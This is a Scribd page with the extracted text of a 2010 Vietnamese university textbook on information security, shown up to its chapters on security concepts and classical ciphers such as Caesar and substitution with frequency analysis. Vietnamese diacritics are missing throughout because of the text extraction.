Scribd Logo
Upload

Welcome to Scribd!

  • Giaotrinh Antoanthongtin - TiengViet

    Uploaded by

    acuvodoi
    947 views147 pages

    Original Title

    Giaotrinh Antoanthongtin_TiengViet

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    947 views147 pages

    Giaotrinh Antoanthongtin - TiengViet

    Uploaded by

    acuvodoi

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 147

    -1-

    TRNG I HC KINH T K THUT CNG NGHIP KHOA CNG NGH THNG TIN B MN K THUT MY TNH

    GIO TRNH

    AN TON V BO MT THNG TIN

    H ni 8-2010

    -2-

    M u
    Gn y, mn hc An ton v bo mt thng tin c a vo ging dy ti hu ht cc Khoa Cng ngh Thng tin ca cc trng i hc v cao ng. Do cc ng dng trn mng Internet ngy cc pht trin v m rng, nn an ton thng tin trn mng tr thnh nhu cu bt buc cho mi h thng ng dng. p ng yu cu hc tp v t tm hiu ca sinh vin cc chuyn ngnh Cng ngh Thng tin, B mn Khoa hc my tnh, Khoa Cng ngh Thng tin t chc bin son gio trnh ny. Ni dung ca n c da trn mt s ti liu, nhng ch yu l cun sch ca Gio s William Stallings Cryptography and Network Security: Principles and Practice. Cun sch trn c dng lm ti liu ging dy ti nhiu trng i hc. ng thi gio trnh ny cng c hon thin tng bc da trn bi ging ca tc gi cho 4 kha sinh vin Khoa Cng ngh Thng tin va qua. Vi mc ch trang b cc kin thc c s va v gip cho sinh vin hiu c bn cht ca cc kha cnh an ninh trn mng, trong gio trnh tc gi c gng trnh by tm tt cc phn l thuyt c bn v a ra cc ng dng thc t. Gio trnh gm 8 chng. Chng u nu tng quan v bo mt, chng 2 tm tt s lc v m c in, chng 3 trnh by nhng khi nim c bn v trng s hc, chng 4 gii thiu v m khi v chun m d liu, chng 5 nu v m cng khai v RSA, chng 6 a ra khi nim xc thc v hm bm, chng 7 gii thiu ng dng v an ton Web v IP v cui cng chng 8 tm tt v k xm nhp v bin php phng chng bc tng la. Do ln u bin son v cha c nhiu kinh nghim thc t, nn khng trnh khi nhng sai st v li in n nht nh. Tc gi xin vui lng tip nhn mi s ng gp gip cho gio trnh An ton v bo mt thng tin ngy cng tt hn.

    -3MC LC M U .............................................................................................................................2 CHNG I TNG QUAN V BO MT..........................................................................5 I.1. I.2. I.3. I.4. II.1. II.2. II.3. II.4. III.1. III.2. III.3. III.4. IV.1. IV.2. IV.3. IV.4. IV.5. V.1 V.2 V.3 V.4 V.5 Gii thiu chung v bo mt thng tin ................................................................5 Dch v, c ch, tn cng ....................................................................................7 M hnh an ton mng.........................................................................................8 Bo mt thng tin trong h c s d liu ..........................................................10 M i xng ......................................................................................................14 Cc m c in thay th ....................................................................................17 Cc m c in hon v ...................................................................................103 Cc vn khc...............................................................................................103 Cc cu trc i s ...........................................................................................27 Cc php ton trn Modulo ...............................................................................28 Trng Galoa ....................................................................................................31 Gii thiu l thuyt s ......................................................................................36 M khi hin i................................................................................................43 Chun m d liu DES .....................................................................................45 Chun m nng cao AES...................................................................................55 Cc m i xng ng thi ............................................................................62 Bo mt dng m i xng ...............................................................................67 M cng khai ....................................................................................................71 RSA ..................................................................................................................73 Qun l kho ....................................................................................................77 Phn phi kho Diffie-Helman .........................................................................80 M ng cong Elip..........................................................................................81

    CHNG II M C IN .............................................................................................14

    CHNG III TRNG S HC .....................................................................................27

    CHNG IV M KHI V CHUN M D LIU ......................................................43

    CHNG V KHO CNG KHAI V RSA ....................................................................71

    CHNG VI XC THC MU TIN V CC HM HASH ........................................86

    -4VI.1 VI.2 VI.3 VI.4 VII.1 VII.2 VII.3 VII.4 VIII.1 VIII.2 VIII.3 VIII.4 Xc thc mu tin .............................................................................................86 Cc hm HASH.................................................................................................88 Cc thut ton HASH v MAC .........................................................................90 Cc ng dng xc thc ...................................................................................100 An ton IP ......................................................................................................106 An ton Web....................................................................................................108 Thanh ton in t an ton..............................................................................112 An ton th in t.........................................................................................115 K xm nhp .................................................................................................120 Phn mm c hi .............................................................................................123 Trn b m ...................................................................................................128 Bc tng la..................................................................................................134

    CHNG VII AN TON IP V WEB............................................................................106

    CHNG VIII K XM NHP V BC TNG LA ............................................120

    DANH MC CC K HIU, CC CH VIT TT.....................................................142 Ph lc .........................................................................................................................145

    -5CHNG I TNG QUAN V BO MT I.1 Gii thiu chung v bo mt thng tin I.1.1 M u v bo mt thng tin Ngy nay vi s pht trin bng n ca cng ngh thng tin, hu ht cc thng tin ca doanh nghip nh chin lc kinh doanh, cc thng tin v khch hng, nh cung cp, ti chnh, mc lng nhn vin,u c lu tr trn h thng my tnh. Cng vi s pht trin ca doanh nghip l nhng i hi ngy cng cao ca mi trng kinh doanh yu cu doanh nghip cn phi chia s thng tin ca mnh cho nhiu i tng khc nhau qua Internet hay Intranet. Vic mt mt, r r thng tin c th nh hng nghim trng n ti chnh, danh ting ca cng ty v quan h vi khch hng. Cc phng thc tn cng thng qua mng ngy cng tinh vi, phc tp c th dn n mt mt thng tin, thm ch c th lm sp hon ton h thng thng tin ca doanh nghip. V vy an ton v bo mt thng tin l nhim v rt nng n v kh on trc c, nhng tu trung li gm ba hng chnh sau: - Bo m an ton thng tin ti my ch - Bo m an ton cho pha my trm - Bo mt thng tin trn ng truyn ng trc yu cu bo mt thng tin, ngoi vic xy dng cc phng thc bo mt thng tin th ngi ta a ra cc nguyn tc v bo v d liu nh sau: - Nguyn tc hp php trong lc thu thp v x l d liu. - Nguyn tc ng n. - Nguyn tc ph hp vi mc ch. - Nguyn tc cn xng. - Nguyn tc minh bch. - Nguyn tc c cng quyt nh cho tng c nhn v bo m quyn truy cp cho ngi c lin quan. - Nguyn tc khng phn bit i x. - Nguyn tc an ton. - Nguyn tc c trch nim trc php lut. - Nguyn tc gim st c lp v hnh pht theo php lut. - Nguyn tc mc bo v tng ng trong vn chuyn d liu xuyn bin gii. y chng ta s tp trung xem xt cc nhu cu an ninh v ra cc bin php an ton cng nh vn hnh cc c ch t c cc mc tiu . Nhu cu an ton thng tin: An ton thng tin thay i rt nhiu trong thi gian gn y. Trc kia hu nh ch c nhu cu bo mt thng tin, nay i hi thm nhiu yu cu mi nh an ninh my ch v trn mng. Cc phng php truyn thng c cung cp bi cc c ch hnh chnh v phng tin vt l nh ni lu tr bo v cc ti liu quan trng v cung cp giy php c quyn s dng cc ti liu mt .

    -6 My tnh i hi cc phng php t ng bo v cc tp v cc thng tin lu tr. Nhu cu bo mt rt ln v rt a dng, c mt khp mi ni, mi lc. Do khng th khng ra cc qui trnh t ng h tr bo m an ton thng tin. Vic s dng mng v truyn thng i hi phi c cc phng tin bo v d liu khi truyn. Trong c c cc phng tin phn mm v phn cng, i hi c nhng nghin cu mi p ng cc bi ton thc tin t ra.

    Cc khi nim: An ton my tnh: tp hp cc cng c c thit k bo v d liu v chng hacker. An ton mng: cc phng tin bo v d liu khi truyn chng. An ton Internet: cc phng tin bo v d liu khi truyn chng trn tp cc mng lin kt vi nhau. Mc ch ca mn hc l tp trung vo an ton Internet gm cc phng tin bo v, chng, pht hin, v hiu chnh cc ph hoi an ton khi truyn v lu tr thng tin. I.1.2 Nguy c v him ha i vi h thng thng tin Cc him ha i vi h thng c th c phn loi thnh him ha v tnh hay c , ch ng hay th ng. - Him ha v tnh: khi ngi dng khi ng li h thng ch c quyn, h c th ty chnh sa h thng. Nhng sau khi hon thnh cng vic h khng chuyn h thng sang ch thng thng, v tnh k xu li dng. - Him ha c : nh c tnh truy nhp h thng tri php. - Him ha th ng: l him ha nhng cha hoc khng tc ng trc tip ln h thng, nh nghe trm cc gi tin trn ng truyn. - Him ha ch ng: l vic sa i thng tin, thay i tnh trng hoc hot ng ca h thng. i vi mi h thng thng tin mi e da v hu qu tim n l rt ln, n c th xut pht t nhng nguyn nhn nh sau: - T pha ngi s dng: xm nhp bt hp php, n cp ti sn c gi tr - Trong kin trc h thng thng tin: t chc h thng k thut khng c cu trc hoc khng mnh bo v thng tin. - Ngay trong chnh sch bo mt an ton thng tin: khng chp hnh cc chun an ton, khng xc nh r cc quyn trong vn hnh h thng. - Thng tin trong h thng my tnh cng s d b xm nhp nu khng c cng c qun l, kim tra v iu khin h thng. - Nguy c nm ngay trong cu trc phn cng ca cc thit b tin hc v trong phn mm h thng v ng dng do hng sn xut ci sn cc loi 'rp' in t theo nh trc, gi l 'bom in t'. - Nguy him nht i vi mng my tnh m l tin tc, t pha bn ti phm. I.1.3 Phn loi tn cng ph hoi an ton:

    -7-

    Cc h thng trn mng c th l i tng ca nhiu kiu tn cng: - Tn cng gi mo l mt thc th tn cng gi danh mt thc th khc. Tn cng gi mo thng c kt hp vi cc dng tn cng khc nh tn cng chuyn tip v tn cng sa i thng bo. - Tn cng chuyn tip xy ra khi mt thng bo, hoc mt phn thng bo c gi nhiu ln, gy ra cc tc ng tiu cc. - Tn cng sa i thng bo xy ra khi ni dung ca mt thng bo b sa i nhng khng b pht hin. - Tn cng t chi dch v xy ra khi mt thc th khng thc hin chc nng ca mnh, gy cn tr cho cc thc th khc thc hin chc nng ca chng. - Tn cng t bn trong h thng xy ra khi ngi dng hp php c tnh hoc v can thip h thng tri php. Cn tn cng t bn ngoi l nghe trm, thu chn, gi mo ngi dng hp php v vt quyn hoc lch qua cc c ch kim sot truy nhp. Tn cng b ng. Do thm, theo di ng truyn : o nhn c ni dung bn tin hoc o theo di lung truyn tin Tn cng ch ng. Thay i lung d liu : o gi mo mt ngi no . o lp li bn tin trc o thay i ban tin khi truyn o t chi dch v. I.2 Dch v, c ch, tn cng. Nhu cu thc tin dn n s cn thit c mt phng php h thng xc nh cc yu cu an ninh ca t chc. Trong cn c tip cn tng th xt c ba kha cnh ca an ton thng tin: bo v tn cng, c ch an ton v dch v an ton. Sau y chng ta xt chng theo trnh t ngc li:

    -8I.2.1 Cc dch v an ton. y l cng c m bo an ton ca h thng x l thng tin v truyn thng tin trong t chc. Chng c thit lp chng li cc tn cng ph hoi. C th dng mt hay nhiu c ch an ton cung cp dch v. Thng thng ngi ta cn phi to ra cc lin kt vi cc ti liu vt l: nh c ch k, ngy thng, bo v cn thit chng khm ph, sa by, ph hoi, c cng chng, chng kin, c ghi nhn hoc c bn quyn. I.2.2 Cc c ch an ton: T cc cng vic thc t chng li cc ph hoi an ninh, ngi ta h thng v sp xp li to thnh cc c ch an ninh khc nhau. y l c ch c thit k pht hin, bo v hoc khi phc do tn cng ph hoi. Khng c c ch n l no p ng c mi chc nng yu cu ca cng tc an ninh. Tuy nhin c mt thnh phn c bit nm trong mi c ch an ton l: k thut m ho. Do chng ta s dnh mt thi lng nht nh tp trung vo l thuyt m. I.2.3 Tn cng ph hoi an ninh: Ta xc nh r th no l cc hnh ng tn cng ph hai an ninh. l mi hnh ng chng li s an ton thng tin ca cc t chc. An ton thng tin l bn v bng cch no chng li tn cng vo h thng thng tin hoc pht hin ra chng. Trn thc t c rt nhiu cch v nhiu kiu tn cng khc nhau. Thng thut ng e do v tn cng c dng nh nhau. Cn tp trung chng mt s kiu tn cng chnh: th ng v ch ng.

    I.3 M hnh an ton mng I.3.1 Kin trc an ton ca h thng truyn thng m OSI. gip cho vic hoch nh chnh sch v xy dng h thng an ninh tt. B phn chun ha tiu chun ca t chc truyn thng quc t (International Telecommunication

    -9Union) nghin cu v ra Kin trc an ninh X800 dnh cho h thng trao i thng tin m OSI. Trong nh ngha mt cch h thng phng php xc nh v cung cp cc yu cu an ton.N cung cp cho chng ta mt cch nhn tng qut, hu ch v cc khi nim m chng ta nghin cu. Trc ht ni v dich v an ton, X800 nh ngha y l dch v cung cp cho tng giao thc ca cc h thng m trao i thng tin, m m bo an ton thng tin cn thit cho h thng v cho vic truyn d liu. Trong ti liu cc thut ng chun trn Internet RFC 2828 nu nh ngha c th hn dich v an ton l dch v trao i v x l cung cp cho h thng vic bo v c bit cho cc thng tin ngun.Ti liu X800 a ra nh ngha dch v theo 5 loi chnh: - Xc thc: tin tng l thc th trao i ng l ci tuyn b. Ngi ang trao i xng tn vi mnh ng l anh ta, khng cho php ngi khc mo danh. - Quyn truy cp: ngn cm vic s dng ngun thng tin khng ng vai tr. Mi i tng trong h thng c cung cp cc quyn hn nht nh v ch c hnh ng trong khun kh cc quyn hn . - Bo mt d liu: bo v d liu khng b khm ph bi ngi khng c quyn. Chng hn nh dng cc k hiu khc thay th cc k hiu trong bn tin, m ch ngi c bn quyn mi c th khi phc nguyn bn ca n. - Ton vn d liu: tin tng l d liu c gi t ngi c quyn. Nu c thay i nh lm tr hon v mt thi gian hay sa i thng tin, th xc thc s cho cch kim tra nhn bit l c cc hin tng xy ra. - Khng t chi: chng li vic chi b ca mt trong cc bn tham gia trao i. Ngi gi cng khng tri b l mnh gi thng tin vi ni dung nh vy v ngi nhn khng th ni di l ti cha nhn c thng tin . iu ny l rt cn thit trong vic trao i, tha thun thng tin hng ngy. C ch an ton c nh ngha trong X800 nh sau: - C ch an ton chuyn dng c ci t trong mt giao thc ca mt tng vn chuyn no : m ho, ch k in t, quyn truy cp, ton vn d liu, trao i c php, m truyn, kim sot nh hng, cng chng. - C ch an ton ph dng khng ch r c dng cho giao thc trn tng no hoc dch v an ninh c th no: chc nng tin cy cho mt tiu chun no , nhn an ton chng t i tng c tnh cht nht nh, pht hin s kin, vt theo di an ton, khi phc an ton. I.3.2 M hnh an ton mng tng qut S dng m hnh trn i hi chng ta phi thit k: o thut ton ph hp cho vic truyn an ton. o Pht sinh cc thng tin mt (kho) c s dng bi cc thut ton. o Pht trin cc phng php phn phi v chia s cc thng tin mt. o c t giao thc cho cc bn s dng vic truyn v thng tin mt cho cc dch v an ton.

    M hnh truy cp mng an ton:

    - 10 -

    S dng m hnh trn i hi chng ta phi: o La chn hm canh cng ph hp cho ngi s dng c danh tnh. o Ci t kim sot quyn truy cp tin tng rng ch c ngi c quyn mi truy cp c thng tin ch hoc ngun. o Cc h thng my tnh tin cy c th dng m hnh ny. I.4 Bo mt thng tin trong h c s d liu I.4.1 Gii thiu chung Cc h c s d liu (CSDL) ngy nay nh Oracle, SQL/Server, DB2/Informix u c sn cc cng c bo v tiu chun nh h thng nh danh v kim sot truy xut. Tuy nhin, cc bin php bo v ny hu nh khng c tc dng trc cc tn cng t bn trong. bo v thng tin khi mi e da ny, ngi ta a ra hai gii php. Gii php n gin nht bo v d liu trong CSDL mc tp tin, chng li s truy cp tri php vo cc tp tin CSDL bng hnh thc m ha. Tuy nhin, gii php ny khng cung cp mc bo mt truy cp n CSDL mc bng, ct v dng. Mt im yu na ca gii php ny l bt c ai vi quyn truy xut CSDL u c th truy

    - 11 cp vo tt c d liu trong CSDL cng c ngha l cho php cc i tng vi quyn qun tr truy cp tt c cc d liu nhy cm. Gii php th hai, gii quyt vn m ha mc ng dng. Gii php ny x l m ha d liu trc khi truyn d liu vo CSDL. Nhng vn v qun l kha v quyn truy cp c h tr bi ng dng. Truy vn d liu n CSDL s tr kt qu d liu dng m ha v d liu ny s c gii m bi ng dng. Gii php ny gii quyt c vn phn tch quyn an ton v h tr cc chnh sch an ton da trn vai tr. I.4.2 Mt s m hnh bo mt c s d liu p ng nhng yu cu v bo mt cho cc h thng CSDL hin ti v sau ny ngi ta a ra 2 m hnh bo mt CSDL thng thng sau y Xy dng tng CSDL trung gian: Mt CSDL trung gian c xy dng gia ng dng v CSDL gc. CSDL trung gian ny c vai tr m ha d liu trc khi cp nht vo CSDL gc, ng thi gii m d liu trc khi cung cp cho ng dng. CSDL trung gian ng thi cung cp thm cc chc nng qun l kha, xc thc ngi dng v cp php truy cp. Gii php ny cho php to thm nhiu chc nng v bo mt cho CSDL. Tuy nhin, m hnh CSDL trung gian i hi xy dng mt ng dng CSDL ti to tt c cc chc nng ca CSDL gc.

    M hnh trung gian S dng c ch sn c trong CSDL M hnh ny gii quyt cc vn m ha ct da trn cc c ch sau: a. Cc hm Stored Procedure trong CSDL cho chc nng m ha v gii m b. S dng c ch View trong CSDL to cc bng o, thay th cc bng tht c m ha. c. C ch instead of trigger c s dng nhm t ng ha qu trnh m ha t View n bng gc.

    - 12 Trong m hnh ny, d liu trong cc bng gc s c m ha, tn ca bng gc c thay i. Mt bng o c to ra mang tn ca bng gc, ng dng s truy cp n bng o ny. Truy xut d liu trong m hnh ny c th c tm tt nh sau:

    M hnh bng o Cc truy xut d liu n bng gc s c thay th bng truy xut n bng o. Bng o c to ra m phng d liu trong bng gc. Khi thc thi lnh select, d liu s c gii m cho bng o t bng gc ( c m ha). Khi thc thi lnh Insert, Update, instead of trigger s c thi hnh v m ha d liu xung bng gc. Qun l phn quyn truy cp n cc ct s c qun l cc bng o. Ngoi cc quyn c bn do CSDL cung cp, hai quyn truy cp mi c nh ngha: 1. Ngi s dng ch c quyn c d liu dng m ha. Quyn ny ph hp vi nhng i tng cn qun l CSDL m khng cn c ni dung d liu. 2. Ngi s dng c quyn c d liu dng gii m. I.4.3 S lc kin trc ca 1 h bo mt CSDL Triggers: cc trigger c s dng ly d liu n t cc cu lnh INSERT, UPDATE ( m ha). Views: cc view c s dng ly d liu n t cc cu lnh SELECT ( gii m). Extended Stored Procedures: c gi t cc Trigger hoc View dng kch hot cc dch v c cung cp bi Modulo DBPEM t trong mi trng ca h qun tri CSDL. DBPEM (Database Policy Enforcing Modulo): cung cp cc dch v m ha/gii m d liu gi n t cc Extended Stored Procedures v thc hin vic kim tra quyn truy xut ca ngi dng (da trn cc chnh sch bo mt c lu tr trong CSDL v quyn bo mt).

    - 13 -

    Kin trc mt h bo mt CSDL Security Database: lu tr cc chnh sch bo mt v cc kha gii m. Xu hng ngy nay thng l lu tr CSDL v bo mt ny trong Active Directory (mt CSDL dng th mc lu tr tt c thng tin v h thng mng). Security Services: ch yu thc hin vic bo v cc kha gii m c lu trong CSDL bo mt. Management Console: dng cp nht thng tin lu trong CSDL bo mt (ch yu l son tho cc chnh sch bo mt) v thc hin thao tc bo v mt trng no trong CSDL m bo ti a tnh bo mt, thng tin c trao i.

    - 14 -

    CHNG II M C IN M ho c in l phng php m ho n gin nht xut hin u tin trong lch s ngnh m ho. Thut ton n gin v d hiu. Nhng phng php m ho ny l c s cho vic nghin cu v pht trin thut ton m ho i xng c s dng ngy nay. Trong m ho c in c hai phng php ni bt l: - M ho thay th - M ho hon v Mi m c in u l m i xng m chng ta s xt trong phn sau. II.1 M i xng. II.1.1 Cc khi nim c bn Mt m i xng s dng cng mt kha cho vic m ha v gii m. C th ni m i xng l m mt kho hay m kha ring hay m kho tha thun. y ngi gi v ngi nhn chia s kho chung K, m h c th trao i b mt vi nhau. Ta xt hai hm ngc nhau: E l hm bin i bn r thnh bn m v D l hm bin i bn m tr v bn r. Gi s X l vn bn cn m ha v Y l dng vn bn c thay i qua vic m ha. Khi ta k hiu: Y = EK(X) X = DK(Y) Mi thut ton m c in u l m kho i xng, v thng tin v kha c chia s gia ngi gi v ngi nhn. M i xng l kiu duy nht trc khi pht minh ra kho m cng khai (cn c gi l m khng i xng) vo nhng nm 1970. Hin nay cc m i xng v cng khai tip tc pht trin v hon thin. M cng khai ra i h tr m i xng ch khng thay th n, do m i xng n nay vn c s dng rng ri. Sau y ta a ra nh ngha mt s khi nim c bn v m ha. 1. Bn r X c gi l l bn tin gc. Bn r c th c chia nh c kch thc ph hp. 2. Bn m Y l bn tin gc c m ho. y ta thng xt phng php m ha m khng lm thay i kch thc ca bn r, tc l chng c cng di. 3. M l thut ton E chuyn bn r thnh bn m. Thng thng chng ta cn thut ton m ha mnh, cho d k th bit c thut ton, nhng khng bit thng tin v kha cng khng tm c bn r. 4. Kho K l thng tin tham s dng m ho, ch c ngi gi v ngui nhn bit. Kha l c lp vi bn r v c di ph hp vi yu cu bo mt. 5. M ho l qu trnh chuyn bn r thnh bn m, thng thng bao gm vic p dng thut ton m ha v mt s qu trnh x l thng tin km theo. 6. Gii m chuyn bn m thnh bn r, y l qu trnh ngc li ca m ha. 7. Mt m l chuyn ngnh khoa hc ca Khoa hc my tnh nghin cu v cc nguyn l v phng php m ho. Hin nay ngi ta a ra nhiu chun an ton cho cc lnh vc khc nhau ca cng ngh thng tin.

    - 15 8. Thm m nghin cu cc nguyn l v phng php gii m m khng bit kho. Thng thng khi a cc m mnh ra lm chun dng chung gia cc ngi s dng, cc m c cc k thm m cng nh nhng ngi pht trin m tm hiu nghin cu cc phng php gii mt phn bn m vi cc thng tin khng y . 9. L thuyt m bao gm c mt m v thm m. N l mt th thng nht, nh gi mt m mnh hay khng, u phi xt t c hai kha cnh . Cc nh khoa hc mong mun tm ra cc m hnh m ha khi qut cao p ng nhiu chnh sch an ton khc nhau. M hnh m i xng

    II.1.2 Cc yu cu. Mt m i xng c cc c trng l cch x l thng tin ca thut ton m, gii m, tc ng ca kha vo bn m, di ca kha. Mi lin h gia bn r, kha v bn m cng phc tp cng tt, nu tc tnh ton l chp nhn c. C th hai yu cu s dng an ton m kho i xng l 1. Thut ton m ho mnh. C c s ton hc vng chc m bo rng mc d cng khai thut ton, mi ngi u bit, nhng vic thm m l rt kh khn v phc tp nu khng bit kha. 2. Kho mt ch c ngi gi v ngi nhn bit. C knh an ton phn phi kho gia cc ngi s dng chia s kha. Mi lin h gia kha v bn m l khng nhn bit c. II.1.3 Mt m H mt m c c trng bi cc yu t sau - Kiu ca thao tc m ho c s dng trn bn r: 1. Php th - thay th cc k t trn bn r bng cc k t khc 2. Hon v - thay i v tr cc k t trong bn r, tc l thc hin hon v cc k t ca bn r. 3. Tch ca chng, tc l kt hp c hai kiu thay th v hon v cc k t ca bn r. - S kho c s dng khi m ha: mt kho duy nht - kho ring hoc hai kho kho cng khai. Ngoi ra cn xem xt s kha c dng c nhiu khng.

    - 16 - Mt c trng ca m na l cch m bn r c x l, theo: 1. Khi - d liu c chia thnh tng khi c kch thc xc nh v p dng thut ton m ha vi tham s kha cho tng khi. 2. Dng - tng phn t u vo c x l lin tc to phn t u ra tng ng. II.1.4 Thm m. C hai cch tip cn tn cng m i xng. 1. Tn cng thm m da trn thut ton v mt s thng tin v cc c trng chung v bn r hoc mt s mu bn r/bn m. Kiu tn cng ny nhm khai ph cc c trng ca thut ton tm bn r c th hoc tm kha. Nu tm c kha th l tai ha ln. 2. Tn cng duyt ton b: k tn cng tm cch th mi kha c th trn bn m cho n khi nhn c bn r. Trung bnh cn phi th mt na s kha mi tm c. Cc kiu tn cng thm m. - Ch dng bn m: bit thut ton v bn m, dng phng php thng k, xc nh bn r. - Bit bn r: bit thut ton, bit c bn m/bn r tn cng tm kha. - Chn bn r: chn bn r v nhn c bn m, bit thut ton tn cng tm kha. - Chn bn m: chn bn m v c c bn r tng ng, bit thut ton tn cng tm kha. - Chn bn tin: chn c bn r hoc m v m hoc gii m tung ng, tn cng tm kha. II.1.5 Tm duyt tng th (Brute-Force) V mt l thuyt phng php duyt tng th l lun thc hin c, do c th tin hnh th tng kho, m s kho l hu hn. Phn ln cng sc ca cc tn cng u t l thun vi kch thc kho. Kha cng di thi gian tm kim cng lu v thng tng theo hm m. Ta c th gi thit l k thm m c th da vo bi cnh bit hoc nhn bit c bn r. Sau y l mt s thng k v mi lin h gia di kha, kch thc khng gian kha, tc x l v thi gian tm duyt tng th. Chng ta nhn thy vi di kha t 128 bit tr ln, thi gian yu cu l rt ln, ln n hng t nm, nh vy c th coi phng php duyt tng th l khng hin thc.

    - 17 -

    II.1.6 an ton. C th phn lai an ton thnh hai kiu nh sau: - An ton khng iu kin: y khng quan trng my tnh mnh nh th no, c th thc hin c bao nhiu php ton trong mt giy, m ho khng th b b, v bn m khng cung cp thng tin xc nh duy nht bn r. Vic dng b m ngu nhin mt ln m dng cho d liu m ta s xt cui bi ny c coi l an ton khng iu kin. Ngoi ra cha c thut ton m ha no c coi l an ton khng iu kin. - An ton tnh ton: vi ngun lc my tnh gii hn v thi gian c hn (chng hn thi gian tnh ton khng qu tui ca v tr) m ho coi nh khng th b b. Trong trng hp ny coi nh m ha an ton v mt tnh ton. Ni chung t nay v sau, mt thut ton m ha an ton tnh ton c coi l an ton. II.2 Cc m th c in thay th C hai loi m c in l m thay th v m hon v (hay cn gi l dch chuyn). M thay th l phng php m tng k t (nhm k t) trong bn r c thay th bng mt k t (mt nhm k t) khc to ra bn m. Bn nhn ch cn thay th ngc li trn bn m c c bn r ban u. Trong phng php m hon v, cc k t trong bn r vn c gi nguyn, chng ch c sp xp li v tr to ra bn m. Tc l cc k t trong bn r hon ton khng b thay i bng k t khc m ch o ch ca chng to thnh bn m. Trc ht ta xt cc m c in s dng php thay th cc ch ca bn r bng cc ch khc ca bng ch to thnh bn m. - y cc ch ca bn r c thay bng cc ch hoc cc s hoc cc k t khc. - Hoc nu xem bn r nh mt dy bt, th php th thay cc mu bt bn r bng cc mu bt bn m. II.2.1 M Ceasar y l m th c bit sm nht, c sng to bi Julius Ceasar. Ln u tin c s dng trong qun s. Vic m ho c thc hin n gin l thay mi ch trong bn r bng ch th ba tip theo trong bng ch ci. V d: o Meet me after the toga party o PHHW PH DIWHU WKH WRJD SDUWB y thay ch m bng ch ng th 3 sau m l p (m, n, o, p); thay ch e bng ch ng th 3 sau e l h (e, f, g, h). C th nh ngha vic m ho trn qua nh x trn bng ch ci sau: cc ch dng di l m ca cc ch tng ng dng trn: a b c d e f g h i j k l m n o p q r s t u v w x y z D E F G H I J K L M N O P Q R S T U V W X Y Z A B C

    - 18 V ton hc, nu ta gn s th t cho mi ch trong bng ch ci. Cc ch dng trn c s th t tng ng l s dng di: a b c d e f g h i j k l m 0 1 2 3 4 5 6 7 8 9 10 11 12 n o p q r s t u v w x y z 13 14 15 16 17 18 19 20 21 22 23 24 25 th m Ceasar c nh ngha qua php tnh tin cc ch nh sau: c = E(p) = (p + k) mod (26) p = D(c) = (c k) mod (26) y, p l s th t ca ch trong bn r v c l s th t ca ch tng ng ca bn m; k l kho ca m Ceasar. C 26 gi tr khc nhau ca k, nn c 26 kho khc nhau. Thc t di kho y ch l 1, v mi ch u tnh tin i mt khong nh nhau. Thm m Ceasar l vic lm n gin, do s kho c th c l rt t. Ch c 26 kho c th, v A ch c th nh x vo mt trong s 26 ch ci ca bng ch ci ting Anh: A, B, C, Cc ch khc s c xc nh bng s bc tnh tin tng ng ca A. K thm m c th th ln lt tng kho mt, tc l s dng phng php tm duyt tng th. V s kho t nn vic tm duyt l kh thi. Cho trc bn m, th 26 cch dch chuyn khc nhau, ta s on nhn thng qua ni dung cc bn r nhn c.

    V d. B bn m "GCUA VQ DTGCM" bng cch th cc php tnh tin khc nhau ca bng ch, ta chn c bc tnh tin thch hp l 24 v cho bn r l "easy to break". II.2.2 Cc m bng ch n By gi ta khc phc nhc im ca m Ceasar bng cch m ho cc ch khng ch l dch chuyn bng ch, m c th to ra cc bc nhy khc nhau cho cc ch. Trong mt m mi ch ca bn r c nh x n mt ch khc nhau ca bn m. Do mi cch m nh vy s tng ng vi mt hon v ca bng ch v hon v chnh l kho ca m cho. Nh vy di kho y l 26 v s kho c th c l 26!. S kho nh vy l rt ln. V d. Ta c bn m tng ng vi bn r trong m bng ch n nh sau: Plain: abcdefghijklmnopqrstuvwxyz Cipher: DKVQFIBJWPESCXHTMYAUOLRGZN Plaintext: ifwewishtoreplaceletters Ciphertext: WIRFRWAJUHYFTSDVFSFUUFYA - Tnh an ton ca m trn bng ch n. Tng cng c 26! xp x khong 4 x 1026 kho. Vi kh nhiu kho nh vy nhiu ngi ngh l m trn bng ch n s an ton. Nhng khng phi nh vy. Vn y l do cc c trng v ngn ng. Tuy c s lng kho ln, nhng do cc c trng v tn sut xut hin ca cc ch trong bn r v cc ch tng ng trong bn m l nh nhau, nn k thm m c th on c nh x ca mt s ch v t m tm ra ch m cho cc ch khc. Ta s xt kha cnh ny c th trong mc sau.

    - 19 - Tnh d tha ca ngn ng v thm m. Ngn ng ca loi ngi l d tha. C mt s ch hoc cc cp ch hoc b ba ch c dng thng xuyn hn cc b ch cng di khc. Chng hn nh cc b ch sau y trong ting Anh "th lrd s m shphrd shll nt wnt". Tm li trong nhiu ngn ng cc ch khng c s dng thng xuyn nh nhau. Trong ting Anh ch E c s dng nhiu nht; sau n cc ch T, R, N, I, O, A, S. Mt s ch rt t dng nh: Z, J, K, Q, X. Bng phng php thng k, ta c th xy dng cc bng cc tn sut cc ch n, cp ch, b ba ch. Bng tn sut ch ci ting Anh:

    S dng bng tn sut vo vic thm m iu quan trng l m th trn bng ch n khng lm thay i tn sut tng i ca cc ch, c ngha l ta vn c bng tn sut trn nhng i vi bng ch m tng ng. iu c pht hin bi cc nh khoa hc Ai cp t th k th 9. Do c cch thm m trn bng ch n nh sau: - Tnh ton tn sut ca cc ch trong bn m - So snh vi cc gi tr bit - Tm kim cc ch n hay dng A-I-E, b i NO v b ba RST; v cc b t dng JK, X-Z.. - Trn bng ch n cn xc nh cc ch dng cc bng b i v b ba tr gip.

    V d. Thm m bn m trn bng ch n, cho bn m: UZQSOVUOHXMOPVGPOZPEVSGZWSZOPFPESXUDBMETSXAIZ VUEPHZHMDZSHZOWSFPAPPDTSVPQUZWYMXUZUHSXEPYEP OPDZSZUFPOUDTMOHMQ - Tnh tn sut cc ch - on P v Z l e v t. - Khi ZW l th v ZWP l the. - Suy lun tip tc ta c bn r: it was disclosed yesterday that several informal but

